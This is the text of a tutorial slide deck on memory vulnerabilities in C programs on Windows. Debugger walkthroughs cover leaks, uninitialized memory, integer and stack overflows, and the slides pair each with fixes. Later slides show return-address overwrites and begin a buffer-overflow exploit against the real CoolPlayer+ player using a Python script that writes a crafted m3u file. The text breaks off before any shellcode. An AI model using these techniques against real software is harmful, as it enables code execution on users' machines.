Slide 1
Slide 1 text
Memory leak, memory uninitialized, integer overflow, buffer over-read,
buffer underflow, buffer overflow
Memory Vulnerabilities
Marcelo Martins
exploitedbunker.com
Slide 2
Slide 2 text
Agenda
Introduction
Vulnerabilities
• Memory Leak
• Memory Uninitialized
• Buffer Over-read
• Buffer Underflow
• Buffer Overflow
Summary
Slide 3
Slide 3 text
Introduction
• Goal
• Introduce the concepts of finding and exploiting Windows
applications (mostly) in order to understand what are those
vulnerabilities and a few ways to protect against them
• This will not be a comprehensive discussion on any of these topics
because there is a lot to learn and we’re only scratching the
surface
• Intended audience
• Information security professionals and software developers looking
for some technical insights
• Disclaimer
• I do not endorse any form of illegal activity
MEMORY VULNERABILITIES
Slide 4
Slide 4 text
Introduction
• Memory leak happens when a computer program
incorrectly manages memory allocations and the memory
no longer needed is not released
• Buffer overflow is an anomaly where a program, while
writing data to a buffer, overruns the buffer's boundary
and overwrites memory in adjacent locations
• May vary according to
• Machine architecture
• Multi-threading
• System version
• Compiler version
• Programming language
• Amount of available memory
MEMORY VULNERABILITIES
Slide 5
Slide 5 text
Introduction
• IEEE: The 2015 Top Ten Programming Languages
MEMORY VULNERABILITIES
Source: http://spectrum.ieee.org/computing/software/the-2015-top-ten-programming-languages
2015 2014
Slide 6
Slide 6 text
Introduction
• You should know a little bit about
• Computer Architecture
• C coding
• Debugging
• Disassembling
PREREQUISITES
Slide 7
Slide 7 text
Introduction
• Debuggers
• Immunity Debugger 1.85 (the one used here)
• http://www.immunityinc.com/products/debugger/
• OllyDbg 1.10
• http://www.ollydbg.de/
• Demos
• Compilation
• Windows 7 64-bit Ultimate N SP1
• C Code compiled with GCC 4.8.1 (the one used here)
• https://sourceforge.net/downloads/mingw
• Download and execute mingw-get-setup.exe
• There may be conflict with other GCCs (e.g.: Strawberry Perl)
• Execution
• Windows 7 64-bit Ultimate N SP1 (where the images come from)
DEMOS
Slide 8
Slide 8 text
Introduction
• Setup
• Download and execute mingw-get-setup.exe
• From https://sourceforge.net/downloads/mingw
• On MinGW Installation Manager, select mingw32-base
• On Installation menu item, click on Apply Changes
• Compilation
• C Code compiled with GCC 4.8.1
> gcc memoryLeak.c -o memoryLeak
> gcc memoryUninitialized.c -o memoryUninitialized
…
• Execution
> memoryLeak
> memoryUninitialized
…
DEMOS
Slide 9
Slide 9 text
Introduction
• Github
• Download and follow the slides
• https://github.com/mmartins000/memory-vulnerabilities
DEMOS
Slide 10
Slide 10 text
Agenda
Introduction
Vulnerabilities
• Memory Leak
• Memory Uninitialized
• Buffer Over-read
• Buffer Underflow
• Buffer Overflow
Summary
Slide 11
Slide 11 text
Memory Leak
EXPLOITATION
Flawed source
code
Slide 12
Slide 12 text
Memory Leak
EXPLOITATION
Slide 13
Slide 13 text
Memory Leak
EXPLOITATION
Allocates memory depleting
all resources
Slide 14
Slide 14 text
Memory Leak
EXPLOITATION
CTRL+C
HIT
Slide 15
Slide 15 text
Memory Leak
SOLUTION
Fixed source
code
Slide 16
Slide 16 text
Memory Leak
SOLUTION
Allocates and unallocates
memory
Slide 17
Slide 17 text
Memory Leak
SOLUTION
Slide 18
Slide 18 text
Memory Leak
EXPLOITATION
• “Can I try it on OSX or Linux?”
• Yes, you can try. Use the same command to compile.
• Run with ./memoryLeak
• Be careful
• Check out the next two slides
• “Will all demos work on other OSes?”
• It is all about trial and error J
Slide 19
Slide 19 text
Memory Leak
EXPLOITATION Executed as non-root user!
Slide 20
Slide 20 text
Memory Leak
EXPLOITATION
CTRL+C
HIT
Slide 21
Slide 21 text
Agenda
Introduction
Vulnerabilities
• Memory Leak
• Memory Uninitialized
• Buffer Over-read
• Buffer Underflow
• Buffer Overflow
Summary
Slide 22
Slide 22 text
Memory Uninitialized
EXPLOITATION
Slide 23
Slide 23 text
Memory Uninitialized
BEFORE WE START
• You may want to take a look at
• Assembly
• http://www.cs.virginia.edu/~evans/cs216/guides/x86.html
• Registers
• https://wiki.skullsecurity.org/Registers
• We will need to go through some basics first
• Memory Uninitialized demo will be used to provide these insights
INTRODUCTION
Slide 24
Slide 24 text
Memory Uninitialized
INTRODUCTION
DEBUGGER: Immunity Debugger 1.85
CPU INSTRUCTIONS
MEMORY DUMP
REGISTERS
MEMORY STACK
COMPILE AND OPEN
memoryUninitialized.exe
Slide 25
Slide 25 text
Memory Uninitialized
INTRODUCTION
DEBUGGER: CPU INSTRUCTIONS
• Right-click anywhere on
CPU INSTRUCTIONS pane,
go to View, select the module to
debug
• If the executable name is not
showing on menu it is probably
already open
Slide 26
Slide 26 text
Memory Uninitialized
INTRODUCTION
DEBUGGER: CPU INSTRUCTIONS
• Right-click anywhere on
CPU INSTRUCTIONS pane,
go to Search for, select
All referenced text strings
Slide 27
Slide 27 text
Memory Uninitialized
INTRODUCTION
DEBUGGER: REFERENCED STRINGS
DOUBLE CLICK
• This window provides a list of strings found inside the
executable file
• Extremely valuable to find your way inside the disassembled code
• Helps to understand what is going on inside a function
Slide 28
Slide 28 text
Memory Uninitialized
INTRODUCTION
2. SELECT AND PRESS F2
1. WE LAND
HERE
TO SET BREAKPOINT:
Slide 29
Slide 29 text
Memory Uninitialized
INTRODUCTION
DEBUGGER: CPU INSTRUCTIONS
BREAKPOINT FOUND
RUN! PRESS F9
UNTIL YOU REACH
THE BREAKPOINT
Slide 30
Slide 30 text
Memory Uninitialized
INTRODUCTION
1. SELECT
2. RIGHT-CLICK
3. SELECT
Addresses, like 0040124B, will most likely change when restarted
DEBUGGER: CPU INSTRUCTIONS
Slide 31
Slide 31 text
Memory Uninitialized
INTRODUCTION
main()
msvcrt.dll
RETURN
ADDRESS
Slide 32
Slide 32 text
Memory Uninitialized
INTRODUCTION
main()
RETURN
ADDRESS
REGISTERS
MEMORY
STACK
CPU
INSTRUCTIONS
TO NEXT CALL ON
PREVIOUS SLIDE
1. RIGHT-CLICK EBP
2. Follow in Stack
INSTRUCTION
POINTER
Before
004013E0
Slide 33
Slide 33 text
Memory Uninitialized
INTRODUCTION
MEMORY STACK
• A stack is a contiguous block of memory containing data
• Serves to dynamically allocate the local variables used in
functions, to pass parameters to the functions, and to
return values from the function
• The last object placed on the stack will be the first object
removed and this is commonly referred to as LIFO (last in,
first out)
• The stack consists of logical stack frames that are pushed
when calling a function and popped when returning
Slide 34
Slide 34 text
Memory Uninitialized
INTRODUCTION
PUSH
FIFO
FIRST IN,
FIRST OUT
LIFO
LAST IN,
FIRST OUT
MEMORY STACK
3
4
2
1
1
1
2
2
3
3
4
4
IN
OUT
IN
OUT
PUSH
POP
POP Original from: chohmann.free.fr
Slide 35
Slide 35 text
Memory Uninitialized
INTRODUCTION
Function Call Process
• Caller
• Push parameters on the stack in reverse order
• Push return address on stack
• Jump to start of function
• Called function entry
• Push local variables on stack
• Called function exit
• Place return value (if any) in register
• Pop local variables off stack
• Jump to address at top of stack
• Caller
• Pop return address and parameters off stack
Slide 36
Slide 36 text
Memory Uninitialized
INTRODUCTION
REGISTERS
• EBP: Base Pointer. Pointer to data on the stack (in the
SS segment). It points to the bottom of the current stack
frame. It is used to reference local variables.
• ESP: Stack Pointer (in the SS segment). It points to the
top of the current stack frame. It is used to reference
local variables.
• EIP: Instruction Pointer
(holds the address of the
next instruction to be
executed)
Slide 37
Slide 37 text
Memory Uninitialized
INTRODUCTION
REGISTERS
0028FF4C
0028FF68
MEMORY STACK
Addresses
will be
different
Saved EBP
Stack
(lower addresses)
…
(higher addresses)
ESP
Return Address
Argv[1]
EBP
CPU INSTRUCTION: PUSH EBP
Saves current EBP to
restore when function
terminates
Slide 38
Slide 38 text
Memory Uninitialized
INTRODUCTION
1. STEP OVER:
PRESS F8
REGISTERS
MEMORY
STACK
CPU
INSTRUCTIONS
2. RIGHT-CLICK EBP
3. Follow in Stack
EXECUTION
POINT
Slide 39
Slide 39 text
Memory Uninitialized
INTRODUCTION
1. STEP OVER:
PRESS F8
REGISTERS
MEMORY
STACK
CPU
INSTRUCTIONS
2. RIGHT-CLICK EBP
3. Follow in Stack
EXECUTION
POINT
EBP = ESP
CPU INSTRUCTION:
MOV EBP, ESP
Slide 40
Slide 40 text
Memory Uninitialized
INTRODUCTION
0028FF48 = 0028FF48
REGISTERS
CPU INSTRUCTION: MOV EBP, ESP
0028FF4C = 00401250
Address Value
Addresses
will be
different
Saved EBP
Stack
(lower addresses)
…
(higher addresses)
EBP
Return Address
Argv[1]
ESP
Slide 41
Slide 41 text
Memory Uninitialized
INTRODUCTION
AND ESP, FFFFFFF0
SUB ESP, 20
Reserved space
for variables
AFTER CPU
INSTRUCTIONS:
REGISTERS
0028FF4C = 00401250
Address Value
0028FF48 =
0028FF20 = 766F5BC4
0028FF68
0028FF68
STEP OVER TWO TIMES AND
EXECUTE SUB ESP, 20
Addresses
will be
different
Saved EBP
Stack
(lower addresses)
…
(higher addresses)
EBP
Return Address
Argv[1]
ESP
Reserved space
for variables
Slide 42
Slide 42 text
Memory Uninitialized
• Text: Executable code of the
program; static size
• Heap: Dynamically allocated data
• Stack: Local variables, arguments,
function return addresses; space
allocated at the top of stack; grows
and shrinks as functions are called
and return
MEMORY LAYOUT
Text
Heap
Stack
Free space
grows
grows
Slide 43
Slide 43 text
Memory Uninitialized
MEMORY LAYOUT
DEBUGGER: MEMORY MAP (ALT+M)
Slide 44
Slide 44 text
Memory Uninitialized
EXPLOITATION
DEBUGGER: CPU INSTRUCTIONS
STEP OVER A FEW TIMES
PRESS F8
NOW, BACK TO
memoryUninitialized.exe
Slide 45
Slide 45 text
Memory Uninitialized
EXPLOITATION
COMPILER
• Changed one printf()
to puts()
• puts() is more efficient
than printf() when
there is no parameter
Slide 46
Slide 46 text
Memory Uninitialized
EXPLOITATION
DEBUGGER: CPU INSTRUCTIONS
Slide 47
Slide 47 text
Memory Uninitialized
EXPLOITATION
DEBUGGER: MEMORY STACK
1. RIGHT-CLICK
2. Follow in Dump
DEBUGGER: MEMORY DUMP LITTLE ENDIAN
EXECUTION
Slide 48
Slide 48 text
Memory Uninitialized
EXPLOITATION
LITTLE ENDIAN NOTATION
00 33 66 99
99 99 66
99 66 33 99 66 33 00
00 33 66 99
00 33 66 99 00 33 66 99
Most
significant
byte
Most
significant
byte
Most
significant
byte
Most
significant
byte
Least
significant
byte
Least
significant
byte
Least
significant
byte
Least
significant
byte
Slide 49
Slide 49 text
Memory Uninitialized
EXPLOITATION
DEBUGGER: CPU INSTRUCTIONS
EIP
DEBUGGER: MEMORY STACK
Slide 50
Slide 50 text
Memory Uninitialized
EXPLOITATION
DEBUGGER: EXECUTION, after printf()
Slide 51
Slide 51 text
Memory Uninitialized
EXPLOITATION
DEBUGGER: MEMORY STACK
&PTR PTR
1. RIGHT-CLICK
2. Follow in Dump
DEBUGGER: MEMORY DUMP
EXECUTION
*PTR
Slide 52
Slide 52 text
Memory Uninitialized
SOLUTION
• malloc() reads “garbage” from memory because it does
not erase the allocated area before it starts using it
• free() should be used after malloc()
• calloc() zeroes the area that will be allocated by the
program and is a better solution that malloc()
• memset() may be used to “erase” that portion of memory
(or overwrite it, using a selected char)
Slide 53
Slide 53 text
Memory Uninitialized
SOLUTION
Slide 54
Slide 54 text
Memory Uninitialized
SOLUTION
EXECUTION
Slide 55
Slide 55 text
Agenda
Introduction
Vulnerabilities
• Memory Leak
• Memory Uninitialized
• Buffer Over-read
• Buffer Underflow
• Buffer Overflow
Summary
Slide 56
Slide 56 text
Buffer Over-read
INTRODUCTION
Slide 57
Slide 57 text
Buffer Over-read
INTRODUCTION
Slide 58
Slide 58 text
Buffer Over-read
INTRODUCTION
Slide 59
Slide 59 text
Buffer Over-read
Solutions depend on the language used
• Use only functions that verify the size of what is being
copied
• Functions that DO NOT verify: gets(), strcpy(), strcat(), sprintf(),
vsprintf(), scanf(), sscanf(), fscanf()
• Functions that should be used: strncpy(), strlcpy() and strlcat()
• Use functions that “end” a string with null char, as the
functions above
SOLUTION
Slide 60
Slide 60 text
Agenda
Introduction
Vulnerabilities
• Memory Leak
• Memory Uninitialized
• Buffer Over-read
• Buffer Underflow
• Buffer Overflow
Summary
Slide 61
Slide 61 text
Buffer Underflow
EXPLOITATION
Slide 62
Slide 62 text
Buffer Underflow
EXPLOITATION
Slide 63
Slide 63 text
Buffer Underflow
SOLUTION
Slide 64
Slide 64 text
Buffer Underflow
SOLUTION
• Avoiding Buffer Underflows
• https://developer.apple.com/library/mac/documentation/Security/
Conceptual/SecureCodingGuide/Articles/BufferOverflows.html
Slide 65
Slide 65 text
Agenda
Introduction
Vulnerabilities
• Memory Leak
• Memory Uninitialized
• Buffer Over-read
• Buffer Underflow
• Buffer Overflow
Summary
Slide 66
Slide 66 text
Buffer Overflow
• Buffer
• Contiguous memory associated with a variable or field
• Common in C code
• All strings are NUL-terminated array of chars
INTRODUCTION
Slide 67
Slide 67 text
Buffer Overflow
• Integer Overflow
• Stack Overflow
• Format String
• Off-by-one Overflow
AGENDA
Slide 68
Slide 68 text
Integer Overflow
INTRODUCTION
Slide 69
Slide 69 text
Integer Overflow
DEMO 0: EXPLOITATION
Slide 70
Slide 70 text
Integer Overflow
DEMO 0: EXPLOITATION COMPILE AND OPEN
integerOverflow.exe
Should be
78000
Slide 71
Slide 71 text
Integer Overflow
DEMO 0: EXPLOITATION
DEBUGGER: CPU INSTRUCTIONS
DEBUGGER: CPU INSTRUCTIONS
STEP OVER (F8)
ONE TIME
Slide 72
Slide 72 text
Integer Overflow
DEMO 0: EXPLOITATION
Slide 73
Slide 73 text
Integer Overflow
DEMO 0: EXPLOITATION
Slide 74
Slide 74 text
Integer Overflow
DEMO 0: EXPLOITATION
Should be
78000
Slide 75
Slide 75 text
Integer Overflow
DEMO 0: SOLUTION
Slide 76
Slide 76 text
Integer Overflow
DEMO 0: SOLUTION
Slide 77
Slide 77 text
Integer Overflow
DEMO 1: EXPLOITATION
Slide 78
Slide 78 text
Integer Overflow
DEMO 1: EXPLOITATION
References:
https://en.wikipedia.org/wiki/2147483647_(number)
https://msdn.microsoft.com/en-us/library/296az74e.aspx
Slide 79
Slide 79 text
Buffer Overflow
• Integer Overflow
• Stack Overflow
• Demo 0: program crash
• Demo 1: buffer overwrite
• Demo 2: dead function call
• Demo 3: shellcode execution
• Format String
• Off-by-one Overflow
AGENDA
Slide 80
Slide 80 text
Stack Overflow
EXPLOITATION 0
Slide 81
Slide 81 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: CPU INSTRUCTIONS
COMPILE AND OPEN
buffer0.exe
Slide 82
Slide 82 text
Stack Overflow
EXPLOITATION 0
Slide 83
Slide 83 text
Stack Overflow
EXPLOITATION 0
Slide 84
Slide 84 text
Stack Overflow
EXPLOITATION 0
RESTART:
CTRL+F2
Slide 85
Slide 85 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: CPU INSTRUCTIONS
• Right-click anywhere on
CPU INSTRUCTIONS pane,
go to View, select the module to
debug
• If the executable name is not
showing on menu it is probably
already open
Slide 86
Slide 86 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: CPU INSTRUCTIONS
• Right-click anywhere on
CPU INSTRUCTIONS pane,
go to Search for, select
All referenced text strings
Slide 87
Slide 87 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: REFERENCED STRINGS
DOUBLE CLICK
Slide 88
Slide 88 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: CPU INSTRUCTIONS
2. SELECT AND PRESS F2
1. WE LAND
HERE
TO SET BREAKPOINT:
USER
COMMENTS:
PRESS ;
3. RUN! PRESS F9
UNTIL YOU REACH
THE BREAKPOINT
Slide 89
Slide 89 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: CPU INSTRUCTIONS
STEP OVER (F8)
UNTIL THIS POINT
MEMORY STACK
REGISTERS
ESP
ESP + 18: garbage
NOT YET
EXECUTED
Slide 90
Slide 90 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: CPU INSTRUCTIONS
STEP OVER (F8)
ONE MORE TIME
MEMORY STACK
REGISTERS
ESP
ESP + 18: “B”
EXECUTED
Slide 91
Slide 91 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: CPU INSTRUCTIONS
STEP OVER (F8)
PAST NULL CHAR
MEMORY STACK
REGISTERS
ESP
ESP + 18
ESP + 10
Slide 92
Slide 92 text
Stack Overflow
EXPLOITATION 0
LOADS ADDR BUFFER1
LOADS ADDR BUFFER2
LOADS ADDR BUFFER1
LOADS ADDR BUFFER2
DEBUGGER: CPU INSTRUCTIONS
Slide 93
Slide 93 text
Stack Overflow
EXPLOITATION 0
MOV ADDR ARG INTO EAX
DEBUGGER: CPU INSTRUCTIONS
Slide 94
Slide 94 text
Stack Overflow
EXPLOITATION 0
[EBP + C]
28FF48 + C (12)
= 28FF5A
• EAX: Main register used in arithmetic calculations. Also known as
accumulator, as it holds results of arithmetic operations and function
return values.
Slide 95
Slide 95 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: MEMORY STACK
Slide 96
Slide 96 text
Stack Overflow
EXPLOITATION 0
ADDS 4 TO EAX
DEBUGGER: CPU INSTRUCTIONS
Slide 97
Slide 97 text
Stack Overflow
EXPLOITATION 0
[EAX + 4]
680EA8 + 4
= 680EAC
Slide 98
Slide 98 text
Stack Overflow
EXPLOITATION 0
RIGHT-CLICK
DEBUGGER: CPU INSTRUCTIONS
Slide 99
Slide 99 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: MEMORY DUMP
LITTLE ENDIAN
RIGHT-CLICK
&PTR PTR
Slide 100
Slide 100 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: MEMORY DUMP
&PTR PTR *PTR
Slide 101
Slide 101 text
Stack Overflow
EXPLOITATION 0
ADDS 4 TO EAX
DEBUGGER: CPU INSTRUCTIONS
Slide 102
Slide 102 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: REGISTERS
STEP OVER (F8)
ONE TIME AND GET
HERE
Slide 103
Slide 103 text
Stack Overflow
EXPLOITATION 0
LOADS ADDR BUFFER2 INTO EAX
MOV ADDR ARG INTO EAX
DEBUGGER: CPU INSTRUCTIONS
STEP OVER (F8)
THREE TIMES
DIFF: LEA and MOV
Slide 104
Slide 104 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: MEMORY STACK
LEA MOV DIFF: LEA and MOV
RET
EBP
ESP
Slide 105
Slide 105 text
Stack Overflow
EXPLOITATION 0
[ESP + 10]
28FF20 + 10
= 28FF30
Slide 106
Slide 106 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: MEMORY STACK
Slide 107
Slide 107 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: MEMORY STACK
Slide 108
Slide 108 text
Stack Overflow
EXPLOITATION 0
EXECUTION
NO PROBLEM
Slide 109
Slide 109 text
Stack Overflow
EXPLOITATION 0
DEBUGGER
SECOND RUN
Slide 110
Slide 110 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: MEMORY STACK
} BUFFER2
} BUFFER1
50 12 40 00
RET
EBP
ESP
Slide 111
Slide 111 text
Stack Overflow
EXPLOITATION 0
EXECUTION
BUFFER
OVERFLOW!
Slide 112
Slide 112 text
Stack Overflow
EXPLOITATION 0
DEBUGGER
THIRD RUN
Slide 113
Slide 113 text
Stack Overflow
EXPLOITATION 0
Saved EBP
Stack
(lower addresses)
…
(higher addresses)
EBP
Return Address
Argv[1]
ESP
BUFF
ER2
BUFF
ER1
Slide 114
Slide 114 text
Stack Overflow
EXPLOITATION 0
RETURN ADDRESS
Stack
(lower addresses)
…
(higher addresses)
EBP
Argv[1]
ESP
abcd
efgh
ijkl
mnop
qrst
uvwx
yz01
2
Slide 115
Slide 115 text
Stack Overflow
EXPLOITATION 0
DEBUGGER: MEMORY STACK
} BUFFER2
} BUFFER1
32 00 40 00
32 = 2 00 = null char 40 = @
RET
EBP
ESP
Slide 116
Slide 116 text
Stack Overflow
EXPLOITATION 0
Slide 117
Slide 117 text
Stack Overflow
EXPLOITATION 0
EXECUTION
CRASH AND BURN!
Slide 118
Slide 118 text
Stack Overflow
EXPLOITATION 0
RETURNS TO…
DEBUGGER: CPU INSTRUCTIONS
STEP INTO (F7)
THIS TIME…
DEBUGGER: MEMORY STACK
Slide 119
Slide 119 text
Stack Overflow
EXPLOITATION 0
VERY FAR FROM
HOME…
DEBUGGER: CPU INSTRUCTIONS
Slide 120
Slide 120 text
Stack Overflow
EXPLOITATION 0
EXECUTION
Slide 121
Slide 121 text
Stack Overflow
It isn’t that hard to spot a buffer overflow possibility
• Source code
• Disassembled code
SOLUTION 0
Slide 122
Slide 122 text
Stack Overflow
Solutions depend on the language used
• Use only functions that verify the size of what is being
copied
• Functions that DO NOT verify: gets(), strcpy(), strcat(), sprintf(),
vsprintf(), scanf(), sscanf(), fscanf()
• Functions that should be used: strncpy(), strlcpy() and strlcat()
• Use functions that “end” a string with null char, as the
functions above
SOLUTION 0
Slide 123
Slide 123 text
Stack Overflow
SOLUTION 0
Two-part
solution
1. Verification
(if)
2. Copy buffer2
max size
Slide 124
Slide 124 text
Stack Overflow
SOLUTION 0
Slide 125
Slide 125 text
Buffer Overflow
• Integer Overflow
• Stack Overflow
• Demo 0: program crash
• Demo 1: buffer overwrite
• Demo 2: dead function call
• Demo 3: shellcode execution
• Format String
• Off-by-one Overflow
AGENDA
Slide 126
Slide 126 text
Stack Overflow
DEMO 1: EXPLOITATION
Slide 127
Slide 127 text
Stack Overflow
NO PROBLEM
DEMO 1: EXPLOITATION
Slide 128
Slide 128 text
Stack Overflow
BUFFER
OVERFLOW!
DEMO 1: EXPLOITATION
Slide 129
Slide 129 text
Stack Overflow
DEBUGGER: CPU INSTRUCTIONS
• Right-click anywhere on
CPU INSTRUCTIONS pane,
go to View, select the module to
debug
• If the executable name is not
showing on menu it is probably
already open
Compile and open
buffer1.exe
DEMO 1: EXPLOITATION
Slide 130
Slide 130 text
Stack Overflow
DEBUGGER: CPU INSTRUCTIONS
• Right-click anywhere on
CPU INSTRUCTIONS pane,
go to Search for, select
All referenced text strings
DEMO 1: EXPLOITATION
Slide 131
Slide 131 text
Stack Overflow
DEBUGGER: REFERENCED STRINGS
DOUBLE CLICK
DEMO 1: EXPLOITATION
Slide 132
Slide 132 text
Stack Overflow
DEBUGGER: CPU INSTRUCTIONS
2. SELECT AND PRESS F2
1. WE LAND
HERE
TO SET BREAKPOINT:
3. RUN! PRESS F9
UNTIL YOU REACH
THE BREAKPOINT
DEMO 1: EXPLOITATION
Slide 133
Slide 133 text
Stack Overflow
DEBUGGER: CPU INSTRUCTIONS
DEBUGGER: REGISTERS
DEMO 1: EXPLOITATION
Slide 134
Slide 134 text
Stack Overflow
DEBUGGER: CPU INSTRUCTIONS
Type the “password” and hit
Enter
DEMO 1: EXPLOITATION
Slide 135
Slide 135 text
Stack Overflow
DEBUGGER: CPU INSTRUCTIONS
DEBUGGER: MEMORY STACK
[ESP + 2C]
28FF10 + 2C
= 28FF3C
Compares 28FF3C with 0
DEMO 1: EXPLOITATION
Slide 136
Slide 136 text
Stack Overflow
DEBUGGER: CPU INSTRUCTIONS
• ESP = 22FF10
• ESP+2C = 28FF3C
• 28FF3C holds 0
• if ESP+2C = 0, jump to LEAVE
• Will jump over “if (pass)” block which contains the message we
want to see
NO PROBLEM
WILL JUMP:
THE LINE IS
CYAN
DEMO 1: EXPLOITATION
Slide 137
Slide 137 text
Stack Overflow
DEBUGGER: CPU INSTRUCTIONS
DEBUGGER: REGISTERS
SECOND RUN
DEMO 1: EXPLOITATION
Slide 138
Slide 138 text
Stack Overflow
DEBUGGER: CPU INSTRUCTIONS
SECOND RUN
DEMO 1: EXPLOITATION
Slide 139
Slide 139 text
Stack Overflow
DEBUGGER: CPU INSTRUCTIONS
DEBUGGER: MEMORY STACK
[ESP + 2C]
28FF10 + 2C
= 28FF3C
Compares 28FF3C with 0
28FF3C = 70 “p”
DEMO 1: EXPLOITATION
Slide 140
Slide 140 text
Stack Overflow
HOW IT WORKS
• ESP = 22FF10
• ESP+2C = 28FF3C
• 28FF3C holds 70
DEMO 1: EXPLOITATION
if True
False == 0
True != 0
70 != 0
True
Slide 141
Slide 141 text
Stack Overflow
DEMO 1: EXPLOITATION
DEBUGGER: CPU INSTRUCTIONS
• ESP = 22FF10
• ESP+2C = 28FF3C
• 28FF3C holds 70
• if ESP+2C = 0, jump to LEAVE
• Will NOT jump over “if (pass)” block which contains the message
we want to see
• The message will be displayed BUFFER
OVERFLOW!
WON’T JUMP:
THE LINE IS
GRAY
Slide 142
Slide 142 text
Stack Overflow
DEMO 1: SOLUTION
Slide 143
Slide 143 text
Stack Overflow
DEMO 1: SOLUTION
Slide 144
Slide 144 text
Buffer Overflow
• Integer Overflow
• Stack Overflow
• Demo 0: program crash
• Demo 1: buffer overwrite
• Demo 2: dead function call
• Demo 3: shellcode execution
• Format String
• Off-by-one Overflow
AGENDA
Slide 145
Slide 145 text
Stack Overflow
DEMO 2: INTRODUCTION
0040143A
Goal: change
RET address to
Address will
probably be
different
calling a dead
function
or any other
function
Stack
(lower addresses)
…
(higher addresses)
EBP
Argv[1]
ESP
abcd
efgh
ijkl
mnop
qrst
uvwx
yz01
RETURN ADDRESS
Slide 146
Slide 146 text
Stack Overflow
0040143A
Address will
probably be
different
DEMO 2: EXPLOITATION
Slide 147
Slide 147 text
Stack Overflow
DEMO 2: EXPLOITATION
COMPILE AND OPEN
buffer2.exe
DEBUGGER: CPU INSTRUCTIONS
Slide 148
Slide 148 text
Stack Overflow
DEMO 2: EXPLOITATION
0040143A
abcdefghijklmnopqr
param1 param2 param3 param4
Slide 149
Slide 149 text
Stack Overflow
DEMO 2: EXPLOITATION
3A 14 40 00
Slide 150
Slide 150 text
Stack Overflow
DEMO 2: EXPLOITATION
COMPILE AND OPEN
buffer2-exploit.exe
Search for
“buffer2.exe”
as a
referenced
string
DEBUGGER: CPU INSTRUCTIONS
Slide 151
Slide 151 text
Stack Overflow
DEMO 2: EXPLOITATION
DEBUGGER: MEMORY STACK
Slide 152
Slide 152 text
Stack Overflow
SHELLCODE
• Assembly instruction, written in hex
• Cannot contain
• Null chars (0x00), carriage return (0x0D), line feed (0x0A), 0xFF
• 0x0B, 0x0C: stop string %s processing when read by sscanf()
• In other cases you may only be allowed to use alphanumeric chars,
for example
DEMO 2: EXPLOITATION
Slide 153
Slide 153 text
Stack Overflow
Solutions depend on the language used
• Use only functions that verify the size of what is being
copied
• Functions that DO NOT verify: gets(), strcpy(), strcat(), sprintf(),
vsprintf(), scanf(), sscanf(), fscanf()
• Functions that should be used: strncpy(), strlcpy() and strlcat()
• Use functions that “end” a string with null char, as the
functions above
DEMO 2: SOLUTION
Slide 154
Slide 154 text
Stack Overflow
DEMO 2: SOLUTION
Slide 155
Slide 155 text
Stack Overflow
DEMO 2: SOLUTION
Only the executable name changed
Slide 156
Slide 156 text
Stack Overflow
DEMO 2: SOLUTION
Buffer received 5 chars and
1 null char
Slide 157
Slide 157 text
Buffer Overflow
• Integer Overflow
• Stack Overflow
• Demo 0: program crash
• Demo 1: buffer overwrite
• Demo 2: dead function call
• Demo 3: shellcode execution
• Format String
• Off-by-one Overflow
AGENDA
Slide 158
Slide 158 text
Stack Overflow
• Jump Shellcode
• A executable code will be provided with the strings that will be read
into the buffer
• A jump must be constructed to read and execute this shellcode
• It is possible to do anything with this shellcode, from opening
calc.exe to creating new users
• The target of the shellcode will be executed as the user that
executed the vulnerable software
• Requirements
• Python 2.7 32-bit (latest version)
• Metasploit or Mona plugin for Immunity Debugger 1.83+
DEMO 3: INTRODUCTION
Slide 159
Slide 159 text
Stack Overflow
DEMO 3: EXPLOITATION
• CoolPlayer+
• Vulnerable version: 2.19.4
• Actual (latest) version: 2.19.4 (from 05 Nov 2013)
• Exploit published in 15 Nov 2013
• m3u file buffer overflow
• https://www.exploit-db.com/exploits/29613/
• Download executable from link above
• Update
• This demo is based on a tutorial published at http://www.securitysift.com/windows-
exploit-development-part-4-locating-shellcode-jumps/
• Jump address changed to run on Windows 7 64-bit Ultimate N
• Ported/rewritten from Perl to Python
• Metasploit commands were updated
Slide 160
Slide 160 text
Stack Overflow
DEMO 3: EXPLOITATION
Goal: find EIP to
overflow
Then, call
shellcode
Stack
(lower addresses)
…
(higher addresses)
EBP
ESP
Aa0A
a1Aa
2Aa3
Aa4A
a5Aa
6Aa7
Aa8A
a9Ab
0Ab1
....
EIP
Slide 161
Slide 161 text
Stack Overflow
DEMO 3: EXPLOITATION
• Generating the pattern to fill the buffer
• Using Metasploit
• Run /usr/share/metasploit-framework/tools/
pattern_create.rb
• Select the pattern and copy to clipboard (CTRL+C)
Slide 162
Slide 162 text
Stack Overflow
DEMO 3: EXPLOITATION
• Generating the pattern to fill the buffer
• Using Mona inside Immunity Debugger 1.83+
• Run !mona pc 10000
• Copy the pattern FROM FILE to clipboard (CTRL+C)
Logs:
ALT+L
Slide 163
Slide 163 text
Stack Overflow
DEMO 3: EXPLOITATION
#!/usr/bin/python
file="coolplayer_try.m3u”
junk =
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6
Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3A
d4Ad5Ad6Ad7………”
f=open(file,"w")
f.write(junk)
f.close()
Write to file
Paste the
pattern here
coolplayer_try.py
Slide 164
Slide 164 text
Stack Overflow
DEMO 3: EXPLOITATION
• What do we have so far?
• A Python script that will create a m3u file that contains 10000 bytes
• Filename will be coolplayer_try.m3u
• The file will contain a sequence of characters, a pattern, that will fill
the buffer causing a buffer overflow
Slide 165
Slide 165 text
Stack Overflow
DEMO 3: EXPLOITATION
Copy coolplayer
folder to C:\
Run C:\coolplayer\App\coolplayer+\coolplayer+.exe
